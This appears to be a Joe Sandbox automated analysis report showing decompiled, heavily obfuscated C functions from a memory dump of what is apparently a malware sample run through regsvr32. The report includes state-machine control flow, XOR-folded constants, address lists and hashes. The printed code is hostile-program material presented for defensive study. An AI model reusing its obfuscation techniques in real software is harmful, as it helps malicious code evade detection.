				_v32 = _v32 ^ 0x00b4bcfb;
				_v64 = 0x655992;
				_v64 = _v64 >> 5;
				_v64 = _v64 | 0x6342cf71;
				_v64 = _v64 ^ 0x634627b6;
				_v116 = 0x833545;
				_v116 = _v116 * 0x75;
				_v116 = _v116 + 0xeb9e;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x00ae15cd;
				while(1) {
					L1:
					_t364 = 0x917a7c8;
					do {
						if(_t379 == 0x771143) {
							_t379 = 0x6e440a7;
							goto L9;
						} else {
							if(_t379 == 0x1a710aa) {
								E040DF7FE(_v64, _v8, _v116, _v72);
							} else {
								if(_t379 == 0x6e440a7) {
									_push(_v92);
									_push(_v76);
									_push(_v108);
									_t367 = E040EE1F8(0x40d14c8, _v120, __eflags);
									_push(_v112);
									_push(_v96);
									_push(_v52);
									__eflags = E040D738A(_v156, _t367, _v164, _v44,  &_v8, E040EE1F8(0x40d1318, _v144, __eflags), _v128) - _v148;
									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
									E040EFECB(_t367, _v140, _v88, _v28, _v36);
									E040EFECB(_t368, _v80, _v124, _v132, _v20);
									_t425 = _v4;
									_t430 =  &(_t430[0x11]);
									_t364 = 0x917a7c8;
									goto L9;
								} else {
									_t436 = _t379 - _t364;
									if(_t379 != _t364) {
										goto L9;
									} else {
										_push(_v16);
										_push(_v60);
										_push(_v160);
										_t375 = E040EE1F8(0x40d1368, _v48, _t436);
										_t420 =  *0x40f6224; // 0x0
										E040DBC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x40d1368, _v24);
										_t379 = 0x1a710aa;
										_t429 =  ==  ? 1 : _t429;
										E040EFECB(_t375, _v68, _v100, _v56, _v32);
										_t430 =  &(_t430[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t429;
						L9:
						__eflags = _t379 - 0x14ee4a5;
					} while (__eflags != 0);
					goto L12;
				}
			}

0x040e8fae
0x040e8fb4
0x040e8fbe
0x040e8fc6
0x040e8fce
0x040e8fd6
0x040e8fe6
0x040e8fe8
0x040e8fec
0x040e8fef
0x040e8ff6
0x040e8ffb
0x040e9004
0x040e9008
0x040e9010
0x040e9018
0x040e9025
0x040e9029
0x040e9031
0x040e9039
0x040e9041
0x040e9049
0x040e904e
0x040e9056
0x040e905e
0x040e9066
0x040e906b
0x040e9073
0x040e907b
0x040e9083
0x040e908b
0x040e9093
0x040e909b
0x040e90a3
0x040e90ab
0x040e90b3
0x040e90bb
0x040e90c3
0x040e90cb
0x040e90d0
0x040e90d8
0x040e90e0
0x040e90e8
0x040e90f0
0x040e90f8
0x040e9100
0x040e9105
0x040e910d
0x040e9115
0x040e911d
0x040e9128
0x040e9130
0x040e913b
0x040e9143
0x040e914b
0x040e9153
0x040e915b
0x040e9168
0x040e916c
0x040e9171
0x040e9179
0x040e9181
0x040e9189
0x040e918e
0x040e9196
0x040e919e
0x040e91a6
0x040e91ab
0x040e91b8
0x040e91bc
0x040e91c4
0x040e91ce
0x040e91d4
0x040e91d9
0x040e91df
0x040e91e7
0x040e91ef
0x040e91f7
0x040e91ff
0x040e920b
0x040e9210
0x040e921a
0x040e921f
0x040e9225
0x040e922d
0x040e9235
0x040e923d
0x040e9242
0x040e924a
0x040e9255
0x040e9260
0x040e926b
0x040e9276
0x040e9281
0x040e928c
0x040e9294
0x040e92a0
0x040e92a3
0x040e92a7
0x040e92af
0x040e92b7
0x040e92bc
0x040e92c1
0x040e92c6
0x040e92ce
0x040e92d6
0x040e92de
0x040e92e3
0x040e92e8
0x040e92f0
0x040e92fb
0x040e9306
0x040e9311
0x040e931c
0x040e9327
0x040e9332
0x040e933f
0x040e9343
0x040e934b
0x040e9350
0x040e9358
0x040e9360
0x040e9365
0x040e936d
0x040e9378
0x040e9380
0x040e938b
0x040e9393
0x040e939b
0x040e93a0
0x040e93a8
0x040e93b3
0x040e93be
0x040e93c9
0x040e93dc
0x040e93e5
0x040e93f0
0x040e93f8
0x040e93fc
0x040e9404
0x040e940c
0x040e9414
0x040e9428
0x040e942b
0x040e9432
0x040e943d
0x040e9445
0x040e944d
0x040e9455
0x040e945d
0x040e9465
0x040e9469
0x040e946e
0x040e9476
0x040e947e
0x040e9483
0x040e948b
0x040e9496
0x040e94a1
0x040e94ac
0x040e94b4
0x040e94b9
0x040e94c1
0x040e94c9
0x040e94d6
0x040e94da
0x040e94e7
0x040e94eb
0x040e94f3
0x040e94f3
0x040e94f3
0x040e94f8
0x040e94fe
0x040e9688
0x00000000
0x040e9504
0x040e950a
0x040e96ae
0x040e9510
0x040e9516
0x040e95c7
0x040e95d0
0x040e95d4
0x040e95dc
0x040e95e1
0x040e95ec
0x040e95f0
0x040e9630
0x040e9647
0x040e9655
0x040e9672
0x040e9677
0x040e967e
0x040e9681
0x00000000
0x040e951c
0x040e951c
0x040e951e
0x00000000
0x040e9524
0x040e9524
0x040e9530
0x040e9534
0x040e953f
0x040e9575
0x040e9581
0x040e959b
0x040e95a7
0x040e95ba
0x040e95bf
0x00000000
0x040e95bf
0x040e951e
0x040e9516
0x040e950a
0x040e96b7
0x040e96c1
0x040e968d
0x040e968d
0x040e968d
0x00000000
0x040e9699

Strings

<S, xrefs: 040E91CE
zPB, xrefs: 040E926B
tU, xrefs: 040E922D

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: e656dc04cb278dfefc3fb19892889eefaee81b4f37a75e444d31873f3b2b911f
Instruction ID: 11abebec2c8c98e1835145f3700144fdc70d461dfb81a7183f5d85afd8c98824
Opcode Fuzzy Hash: e656dc04cb278dfefc3fb19892889eefaee81b4f37a75e444d31873f3b2b911f
Instruction Fuzzy Hash: 84F10F716083809FD368CF21C58AA4BFBF2FBC5748F10891DE59A96260D7B19959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E9DF5, Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040E9DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t196;
				void* _t219;
				char _t222;
				void* _t227;
				char* _t235;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int* _t272;

				_push(_a12);
				_t259 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t196);
				_v164 = 0xe41f8c;
				_t272 =  &(( &_v208)[5]);
				_v164 = _v164 << 0x10;
				_t227 = 0xb5c0777;
				_t260 = 0x69;
				_v164 = _v164 * 0x11;
				_v164 = _v164 ^ 0x18467706;
				_v180 = 0xeb334b;
				_v180 = _v180 ^ 0xb42ec71e;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0xfa2f170d;
				_v204 = 0x9173d0;
				_v204 = _v204 / _t260;
				_v204 = _v204 + 0xc6b3;
				_t261 = 0x22;
				_v204 = _v204 / _t261;
				_v204 = _v204 ^ 0x000ee5cc;
				_v176 = 0x7c8d5;
				_v176 = _v176 | 0x723fe192;
				_v176 = _v176 + 0x4897;
				_v176 = _v176 ^ 0x724c9210;
				_v184 = 0xa283a5;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00039d39;
				_v172 = 0xfcf8f5;
				_t262 = 0x68;
				_v172 = _v172 / _t262;
				_t263 = 0x12;
				_v172 = _v172 / _t263;
				_v172 = _v172 ^ 0x0008ec4c;
				_v196 = 0x6ce5d4;
				_v196 = _v196 + 0x3b25;
				_v196 = _v196 ^ 0x77f3da3b;
				_v196 = _v196 + 0xa9d5;
				_v196 = _v196 ^ 0x779af0ad;
				_v156 = 0x25f26f;
				_t264 = 0x4f;
				_v156 = _v156 / _t264;
				_v156 = _v156 ^ 0x000ca3cb;
				_v188 = 0x55ff28;
				_t265 = 7;
				_v188 = _v188 / _t265;
				_t266 = 0x50;
				_v188 = _v188 / _t266;
				_v188 = _v188 ^ 0x000cd773;
				_v148 = 0x9faf35;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 ^ 0x00041a0d;
				_v144 = 0xb9aa79;
				_v144 = _v144 + 0xffff300b;
				_v144 = _v144 ^ 0x00b65e72;
				_v152 = 0xe2e022;
				_v152 = _v152 << 0xa;
				_v152 = _v152 ^ 0x8b87efd2;
				_v140 = 0x6f845f;
				_v140 = _v140 ^ 0xc6ebfb93;
				_v140 = _v140 ^ 0xc684fc76;
				_v208 = 0x15bd2c;
				_v208 = _v208 + 0xca24;
				_v208 = _v208 + 0xaf45;
				_v208 = _v208 >> 5;
				_v208 = _v208 ^ 0x000727e8;
				_v136 = 0x982476;
				_v136 = _v136 | 0xd92aa943;
				_v136 = _v136 ^ 0xd9b01548;
				_v160 = 0x20104f;
				_v160 = _v160 ^ 0xef20d220;
				_t267 = 0x2e;
				_v160 = _v160 * 0x21;
				_v160 = _v160 ^ 0xcf1410de;
				_v168 = 0x2e9b6b;
				_v168 = _v168 + 0xffff5c1c;
				_v168 = _v168 * 0x26;
				_v168 = _v168 ^ 0x06dc91dd;
				_v192 = 0xd01025;
				_v192 = _v192 | 0x8f03462b;
				_v192 = _v192 + 0xffffdaa2;
				_v192 = _v192 << 2;
				_v192 = _v192 ^ 0x3f4450ba;
				_v200 = 0xfd9656;
				_v200 = _v200 | 0x00ba0155;
				_v200 = _v200 / _t267;
				_t268 = 0x6a;
				_v200 = _v200 / _t268;
				_v200 = _v200 ^ 0x00073cbf;
				while(_t227 != 0x9fc41a2) {
					if(_t227 == 0xa1171ea) {
						_v132 = 0x80;
						_t222 = E040E96C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
						_t272 =  &(_t272[4]);
						_t227 = 0xabd7dae;
						continue;
					} else {
						if(_t227 == 0xabd7dae) {
							__eflags = _v128;
							_t235 =  &_v128;
							while(__eflags != 0) {
								_t222 =  *_t235;
								__eflags = _t222 - 0x30;
								if(_t222 < 0x30) {
									L9:
									__eflags = _t222 - 0x61;
									if(_t222 < 0x61) {
										L11:
										__eflags = _t222 - 0x41;
										if(_t222 < 0x41) {
											L13:
											 *_t235 = 0x58;
										} else {
											__eflags = _t222 - 0x5a;
											if(_t222 > 0x5a) {
												goto L13;
											}
										}
									} else {
										__eflags = _t222 - 0x7a;
										if(_t222 > 0x7a) {
											goto L11;
										}
									}
								} else {
									__eflags = _t222 - 0x39;
									if(_t222 > 0x39) {
										goto L9;
									}
								}
								_t235 = _t235 + 1;
								__eflags =  *_t235;
							}
							_t227 = 0x9fc41a2;
							continue;
						} else {
							if(_t227 == 0xb5c0777) {
								_t227 = 0xa1171ea;
								continue;
							}
						}
					}
					L18:
					__eflags = _t227 - 0x108096a;
					if(__eflags != 0) {
						continue;
					}
					return _t222;
				}
				_push(_v156);
				_push(_v196);
				_push(0x40d119c);
				_t219 = E040E4244(_v184, _v172, __eflags);
				E040F0A1A(E040E5515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
				_t222 = E040EFECB(_t219, _v160, _v168, _v192, _v200);
				_t272 =  &(_t272[0xe]);
				_t227 = 0x108096a;
				goto L18;
			}

0x040e9dff
0x040e9e06
0x040e9e08
0x040e9e0f
0x040e9e16
0x040e9e17
0x040e9e18
0x040e9e1d
0x040e9e25
0x040e9e28
0x040e9e34
0x040e9e3b
0x040e9e3e
0x040e9e42
0x040e9e4a
0x040e9e52
0x040e9e5a
0x040e9e5f
0x040e9e67
0x040e9e77
0x040e9e7b
0x040e9e87
0x040e9e8c
0x040e9e92
0x040e9e9a
0x040e9ea2
0x040e9eaa
0x040e9eb2
0x040e9eba
0x040e9ec2
0x040e9ec7
0x040e9ecc
0x040e9ed4
0x040e9ee0
0x040e9ee5
0x040e9eef
0x040e9ef4
0x040e9efa
0x040e9f02
0x040e9f0a
0x040e9f12
0x040e9f1a
0x040e9f22
0x040e9f2a
0x040e9f36
0x040e9f3b
0x040e9f41
0x040e9f49
0x040e9f55
0x040e9f5a
0x040e9f64
0x040e9f69
0x040e9f6f
0x040e9f7c
0x040e9f89
0x040e9f8e
0x040e9f96
0x040e9f9e
0x040e9fa6
0x040e9fae
0x040e9fb6
0x040e9fbb
0x040e9fc3
0x040e9fcb
0x040e9fd3
0x040e9fdb
0x040e9fe3
0x040e9feb
0x040e9ff3
0x040e9ff8
0x040ea000
0x040ea008
0x040ea010
0x040ea018
0x040ea020
0x040ea02d
0x040ea030
0x040ea034
0x040ea03c
0x040ea044
0x040ea051
0x040ea055
0x040ea05d
0x040ea065
0x040ea06d
0x040ea075
0x040ea07a
0x040ea082
0x040ea08a
0x040ea09a
0x040ea0a2
0x040ea0a5
0x040ea0a9
0x040ea0b1
0x040ea0bb
0x040ea10b
0x040ea129
0x040ea12e
0x040ea131
0x00000000
0x040ea0bd
0x040ea0c3
0x040ea0d5
0x040ea0da
0x040ea0de
0x040ea0e0
0x040ea0e2
0x040ea0e4
0x040ea0ea
0x040ea0ea
0x040ea0ec
0x040ea0f2
0x040ea0f2
0x040ea0f4
0x040ea0fa
0x040ea0fa
0x040ea0f6
0x040ea0f6
0x040ea0f8
0x00000000
0x00000000
0x040ea0f8
0x040ea0ee
0x040ea0ee
0x040ea0f0
0x00000000
0x00000000
0x040ea0f0
0x040ea0e6
0x040ea0e6
0x040ea0e8
0x00000000
0x00000000
0x040ea0e8
0x040ea0fd
0x040ea0fe
0x040ea0fe
0x040ea103
0x00000000
0x040ea0c5
0x040ea0cb
0x040ea0d1
0x00000000
0x040ea0d1
0x040ea0cb
0x040ea0c3
0x040ea1a9
0x040ea1a9
0x040ea1af
0x00000000
0x00000000
0x040ea1bf
0x040ea1bf
0x040ea13b
0x040ea13f
0x040ea14b
0x040ea150
0x040ea185
0x040ea19c
0x040ea1a1
0x040ea1a4
0x00000000

Strings

K3, xrefs: 040E9E4A
%;, xrefs: 040E9F0A
", xrefs: 040E9FAE

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: 5e9b8c78bf88601ff2b0112547e95beb8c68a7c623d6980bbd3632264df9dbb4
Instruction ID: 2146888df85dfc293d40fa1d63cab8d060ca00be83412a36547a9530774c5dd8
Opcode Fuzzy Hash: 5e9b8c78bf88601ff2b0112547e95beb8c68a7c623d6980bbd3632264df9dbb4
Instruction Fuzzy Hash: B3A173726083809FD358DF66C98956FBBE2BBC8758F00891DF185AA220D3B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040DA445, Relevance: 4.0, Strings: 3, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E040DA445() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t198;
				signed int _t201;
				signed int _t203;
				void* _t206;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				signed int _t231;
				signed int* _t232;

				_t232 =  &_v84;
				_v16 = 0x845726;
				_v16 = _v16 << 7;
				_t206 = 0xba97f4f;
				_v16 = _v16 ^ 0x422a9300;
				_v76 = 0xf633ca;
				_v76 = _v76 + 0xffff7f31;
				_v76 = _v76 << 6;
				_v76 = _v76 | 0x2929f239;
				_v76 = _v76 ^ 0x3d62fec6;
				_v20 = 0xcffe1c;
				_v20 = _v20 ^ 0x03d09261;
				_v20 = _v20 ^ 0x03162068;
				_v24 = 0xa4ea56;
				_v24 = _v24 + 0xffff4c41;
				_v24 = _v24 ^ 0x00afa4b9;
				_v40 = 0x50bd11;
				_v40 = _v40 + 0xffffa7ab;
				_v40 = _v40 * 0x3f;
				_t225 = 0;
				_v40 = _v40 ^ 0x13cebba3;
				_v60 = 0x50c08b;
				_v60 = _v60 ^ 0xc2cf2608;
				_v60 = _v60 << 4;
				_t226 = 0x56;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x0073141c;
				_v64 = 0xa37df4;
				_v64 = _v64 + 0xffffdd88;
				_v64 = _v64 + 0xe629;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0527d1d9;
				_v68 = 0x27b9fb;
				_t227 = 0x58;
				_v68 = _v68 / _t227;
				_v68 = _v68 * 0x63;
				_v68 = _v68 * 0x3d;
				_v68 = _v68 ^ 0x0aa4ff90;
				_v72 = 0x604a05;
				_v72 = _v72 | 0x3301bbe0;
				_v72 = _v72 + 0xf4ce;
				_v72 = _v72 + 0xffff6149;
				_v72 = _v72 ^ 0x336b10da;
				_v52 = 0x457d04;
				_v52 = _v52 * 0x45;
				_v52 = _v52 | 0xd82309ca;
				_v52 = _v52 + 0xff64;
				_v52 = _v52 ^ 0xdab2f2cc;
				_v8 = 0x71eccb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000a626b;
				_v12 = 0x94a0c6;
				_v12 = _v12 + 0xffffb2fd;
				_v12 = _v12 ^ 0x009145d9;
				_v56 = 0xdce517;
				_v56 = _v56 >> 1;
				_v56 = _v56 | 0xebc149ed;
				_v56 = _v56 + 0xffff7372;
				_v56 = _v56 ^ 0xebe5f8bb;
				_v44 = 0x6f3a42;
				_v44 = _v44 ^ 0x930a70ca;
				_v44 = _v44 ^ 0x072310e6;
				_v44 = _v44 ^ 0x944572d0;
				_v28 = 0xde598c;
				_v28 = _v28 + 0xffffb8ee;
				_v28 = _v28 ^ 0x00dc27c3;
				_v80 = 0x428d3e;
				_v80 = _v80 * 0x44;
				_v80 = _v80 + 0x7fb1;
				_v80 = _v80 ^ 0x009e7bae;
				_v80 = _v80 ^ 0x11330260;
				_v84 = 0x321edf;
				_v84 = _v84 | 0x009a6787;
				_v84 = _v84 ^ 0xc86f44a5;
				_v84 = _v84 ^ 0xbb12ab62;
				_v84 = _v84 ^ 0x73cf70d9;
				_v48 = 0x740eb7;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 + 0xb6e6;
				_v48 = _v48 ^ 0x040daff3;
				_v32 = 0x3035f0;
				_v32 = _v32 ^ 0xe5f6800a;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0xcb8c371c;
				_v36 = 0xd97c9c;
				_v36 = _v36 >> 3;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x03d4918e;
				_v4 = 0x2cfea0;
				_v4 = _v4 ^ 0xf57e16a0;
				_v4 = _v4 ^ 0xf550cd22;
				_t205 = _v4;
				_t231 = _v4;
				_t228 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						_t198 = 0xd71e2f;
						do {
							L3:
							while(_t206 != _t198) {
								if(_t206 == 0x1e5f8bf) {
									_t201 = E040DEE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
									_t232 =  &(_t232[5]);
									_t231 = _t201;
									_t198 = 0xd71e2f;
									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
									_t220 = 0x5c;
									continue;
								} else {
									if(_t206 == 0x6f129a6) {
										E040D3046(_v48, _v32, _v36, _t205, _v4);
									} else {
										if(_t206 == 0x960e40f) {
											_t203 = E040EE8B6(_t206, _v20, _v24, _t206, _v76, _v40);
											_t205 = _t203;
											_t232 =  &(_t232[4]);
											if(_t203 != 0) {
												_t206 = 0x1e5f8bf;
												goto L1;
											}
										} else {
											if(_t206 == 0xba97f4f) {
												_t206 = 0xbab8332;
												continue;
											} else {
												if(_t206 == 0xbab8332) {
													_t229 =  *0x40f6214; // 0x0
													_t230 = _t229 + 0x23c;
													while( *_t230 != _t220) {
														_t230 = _t230 + 2;
													}
													_t228 = _t230 + 2;
													_t206 = 0x960e40f;
													goto L2;
												} else {
													if(_t206 != 0xe557a67) {
														goto L20;
													} else {
														E040D3046(_v44, _v28, _v80, _t231, _v84);
														_t232 =  &(_t232[3]);
														_t206 = 0x6f129a6;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															_t198 = 0xd71e2f;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L23:
								return _t225;
							}
							E040D1E9B(_v52, _t231, _v8, _v12, _v56);
							_t232 =  &(_t232[3]);
							_t198 = 0xd71e2f;
							_t225 =  !=  ? 1 : _t225;
							_t206 = 0xe557a67;
							_t220 = 0x5c;
							L20:
						} while (_t206 != 0x6b89e3f);
						goto L23;
					}
				}
			}

0x040da445
0x040da448
0x040da452
0x040da457
0x040da45c
0x040da464
0x040da46c
0x040da474
0x040da479
0x040da481
0x040da489
0x040da491
0x040da499
0x040da4a1
0x040da4a9
0x040da4b1
0x040da4b9
0x040da4c1
0x040da4d2
0x040da4d6
0x040da4d8
0x040da4e0
0x040da4e8
0x040da4f0
0x040da4fb
0x040da500
0x040da506
0x040da50e
0x040da516
0x040da51e
0x040da526
0x040da52b
0x040da533
0x040da53f
0x040da542
0x040da54b
0x040da554
0x040da558
0x040da560
0x040da568
0x040da570
0x040da578
0x040da580
0x040da588
0x040da595
0x040da599
0x040da5a1
0x040da5a9
0x040da5b1
0x040da5b9
0x040da5be
0x040da5c6
0x040da5ce
0x040da5d6
0x040da5de
0x040da5e6
0x040da5ea
0x040da5f2
0x040da5fa
0x040da602
0x040da60a
0x040da612
0x040da61a
0x040da622
0x040da62a
0x040da632
0x040da63a
0x040da647
0x040da64b
0x040da653
0x040da65b
0x040da663
0x040da66b
0x040da673
0x040da67b
0x040da683
0x040da68b
0x040da698
0x040da6a1
0x040da6a5
0x040da6ad
0x040da6b5
0x040da6bd
0x040da6c5
0x040da6c9
0x040da6d1
0x040da6d9
0x040da6e3
0x040da6e7
0x040da6ef
0x040da6f7
0x040da6ff
0x040da707
0x040da70b
0x040da70f
0x040da713
0x040da713
0x040da713
0x040da716
0x040da716
0x040da716
0x040da71b
0x00000000
0x040da71b
0x040da729
0x040da7f0
0x040da7f5
0x040da7f8
0x040da801
0x040da806
0x040da80b
0x00000000
0x040da72f
0x040da735
0x040da85f
0x040da73b
0x040da741
0x040da7bd
0x040da7c2
0x040da7c4
0x040da7c9
0x040da7cf
0x00000000
0x040da7cf
0x040da743
0x040da749
0x040da7a2
0x00000000
0x040da74b
0x040da751
0x040da77f
0x040da785
0x040da790
0x040da78d
0x040da78d
0x040da795
0x040da798
0x00000000
0x040da753
0x040da759
0x00000000
0x040da75f
0x040da770
0x040da775
0x040da778
0x040da713
0x040da713
0x040da713
0x040da716
0x040da716
0x00000000
0x040da716
0x040da713
0x040da759
0x040da751
0x040da749
0x040da741
0x040da735
0x040da867
0x040da870
0x040da870
0x040da823
0x040da828
0x040da830
0x040da835
0x040da838
0x040da83f
0x040da840
0x040da840
0x00000000
0x040da84c
0x040da716

Strings

), xrefs: 040DA51E
B:o, xrefs: 040DA602
kb, xrefs: 040DA5BE

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: 2cc2a98d0ae6c425212ba92f77608e725ed8de72ef6d20237f584e768a0bce03
Instruction ID: 664e7f9dfb88e26bd201ad2f7cbe178550c5cd941929f94e605c31c048c3b269
Opcode Fuzzy Hash: 2cc2a98d0ae6c425212ba92f77608e725ed8de72ef6d20237f584e768a0bce03
Instruction Fuzzy Hash: 58A120715083419FC3A8CF65D98981BBBF1BBC4758F009A2DF59AA6260D7B19A098F43

Uniqueness

Uniqueness Score: -1.00%

Function 040EBEFD, Relevance: 4.0, Strings: 3, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040EBEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				char _v616;
				void* _t242;
				void* _t243;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t285;

				_v52 = 0xa5be;
				_t251 = 0x16;
				_v52 = _v52 / _t251;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x0005c33b;
				_v48 = 0xc42d20;
				_v48 = _v48 >> 0xd;
				_v48 = _v48 + 0xffffc4d0;
				_v48 = _v48 ^ 0xfffeda29;
				_v72 = 0x4321a7;
				_v72 = _v72 | 0xa4ce3c40;
				_v72 = _v72 ^ 0xa4cab40f;
				_v24 = 0x227e38;
				_t25 =  &_v24; // 0x227e38
				_t252 = 0x2c;
				_v24 =  *_t25 * 0x3c;
				_t27 =  &_v24; // 0x227e38
				_v24 =  *_t27 * 0x66;
				_t29 =  &_v24; // 0x227e38
				_v24 =  *_t29 / _t252;
				_v24 = _v24 ^ 0x014a285a;
				_v60 = 0xfcfbbc;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x000d93d1;
				_v96 = 0xf80007;
				_v96 = _v96 + 0xaa36;
				_v96 = _v96 ^ 0x00fda443;
				_v80 = 0x5511cc;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0x00043fa8;
				_v88 = 0xbb6e3f;
				_v88 = _v88 + 0xffffbcf0;
				_v88 = _v88 ^ 0x00b4c382;
				_v8 = 0x49da65;
				_v8 = _v8 >> 3;
				_v8 = _v8 >> 7;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 ^ 0x0002f4aa;
				_v16 = 0xc843f1;
				_t253 = 0x50;
				_v16 = _v16 / _t253;
				_v16 = _v16 ^ 0x9e242cdc;
				_v16 = _v16 + 0xffff9a81;
				_v16 = _v16 ^ 0x9e230a73;
				_v36 = 0x2e6bc5;
				_v36 = _v36 | 0x2558a4e0;
				_v36 = _v36 + 0xfffff4e9;
				_v36 = _v36 ^ 0x257724e9;
				_v12 = 0x80a3b9;
				_t254 = 0x6f;
				_v12 = _v12 * 0x79;
				_v12 = _v12 + 0xffff3c67;
				_v12 = _v12 | 0xeef82a75;
				_v12 = _v12 ^ 0xfef88c24;
				_v68 = 0x7db499;
				_v68 = _v68 + 0xffff3f49;
				_v68 = _v68 ^ 0x007e0dc2;
				_v44 = 0x9f49e4;
				_v44 = _v44 << 0xd;
				_v44 = _v44 ^ 0x1368a87d;
				_v44 = _v44 ^ 0xfa51dcf6;
				_v64 = 0x98f463;
				_v64 = _v64 / _t254;
				_v64 = _v64 ^ 0x0008fd0c;
				_v76 = 0x12aedd;
				_v76 = _v76 + 0xf7e7;
				_v76 = _v76 ^ 0x001c1bc6;
				_v28 = 0x4e33bd;
				_t255 = 3;
				_v28 = _v28 / _t255;
				_t256 = 0x48;
				_v28 = _v28 / _t256;
				_t257 = 0x1b;
				_v28 = _v28 * 0x5d;
				_v28 = _v28 ^ 0x002c0e7b;
				_v20 = 0x6739f6;
				_v20 = _v20 * 0x51;
				_v20 = _v20 + 0x822b;
				_v20 = _v20 + 0xffff6302;
				_v20 = _v20 ^ 0x20a7052c;
				_v40 = 0xf776a1;
				_v40 = _v40 | 0xfaf9a8ad;
				_v40 = _v40 + 0xffffa6b3;
				_v40 = _v40 ^ 0xfaf95b8b;
				_v56 = 0xfd0dae;
				_v56 = _v56 / _t257;
				_t258 = 0x23;
				_v56 = _v56 / _t258;
				_v56 = _v56 ^ 0x000358d4;
				_v32 = 0xe62709;
				_v32 = _v32 + 0xffff3f09;
				_v32 = _v32 >> 8;
				_v32 = _v32 ^ 0x0009f673;
				_v92 = 0xdc059c;
				_v92 = _v92 << 4;
				_v92 = _v92 ^ 0x0dc87abe;
				_v84 = 0xab2272;
				_t259 = 0xb;
				_v84 = _v84 / _t259;
				_v84 = _v84 ^ 0x0001c613;
